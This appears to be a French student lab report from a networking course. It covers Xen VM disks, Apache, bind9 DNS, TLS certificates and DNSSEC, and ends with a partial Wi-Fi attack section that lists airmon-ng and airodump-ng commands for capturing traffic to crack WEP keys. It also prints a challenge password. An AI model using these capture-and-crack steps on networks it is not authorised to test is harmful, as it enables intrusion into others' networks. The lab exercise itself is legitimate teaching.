Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires la gestion d'authentification Wifi WPA-EAK ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
